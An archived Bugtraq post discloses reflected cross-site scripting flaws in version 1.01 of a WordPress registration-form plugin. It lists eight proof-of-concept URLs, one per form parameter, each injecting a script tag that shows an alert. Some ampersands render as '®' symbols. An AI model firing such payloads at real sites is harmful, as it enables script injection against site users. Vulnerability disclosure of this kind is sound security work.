| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 14 Nov 2018 02:55:45 GMT
From: Socket_0x03@...aexe.com
To: bugtraq@...urityfocus.com
Subject: Custom Frontend Login Registration Form (WP Plugin) - Multiple
XSS Vulnerabilities
========================================================================================
Custom Frontend Login Registration Form v1.01 (WP Plugin) - Multiple XSS Vulnerabilities
========================================================================================
____________________________________________________________________________________
# Exploit Title: Custom Frontend Login Registration Form (WP Plugin) - Multiple XSS Vulnerabilities
# Date: [11-13-2018]
# Category: Webapps
____________________________________________________________________________________
# Author: Socket_0x03 (Alvaro J. Gene)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www.teraexe.com
____________________________________________________________________________________
# Software Link: https://wordpress.org/plugins/custom-frontend-login-registration-form
# Plugin: Custom Frontend Login Registration Form
# Version: v1.01 (last version)
# File: Registration Form
# Parameters: reg_bio, reg_email, reg_fname, reg_lname, reg_name,
nickname, reg_password, and reg_website.
# Language: This application is available in English language.
# Plugin Description: A WordPress plugin that an administrator can use to create
login forms and custom registration forms; then, after creating those forms,
an admin can use a shortcode to place a login/registration form on a page or post.
____________________________________________________________________________________
# Cross-Site Scripting Vulnerabilities:
Registration Form - Parameter: reg_bio
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=®_bio=qadoh"><script>alert(1)<%2fscript>b7sb3m2scdh®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_email
http://www.website.com/wordpress/index.php/registration-form/?reg_email=i1brx"><script>alert(1)<%2fscript>ee1c8o5kj1l®_website=®_password=®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_fname
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=r3mo6"><script>alert(1)<%2fscript>v4q2lzsnk7m®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_lname
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=ahrpv"><script>alert(1)<%2fscript>z50y4k9db7m
Registration Form - Parameter: reg_name
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=®_fname=®_name=fi8ze"><script>alert(1)<%2fscript>j8rjcha5rvf®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: nickname
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=®_nickname=v0g30"><script>alert(1)<%2fscript>qm20vz35hbz®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_password
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=®_password=nn3du"><script>alert(1)<%2fscript>aopv3zr72k7®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Registration Form - Parameter: reg_website
http://www.website.com/wordpress/index.php/registration-form/?reg_email=®_website=io8na"><script>alert(1)<%2fscript>iuotdm7w5i2®_password=®_nickname=®_fname=®_name=®_bio=®_submit=reg_submit%3dRegister®_lname=
Powered by blists - more mailing lists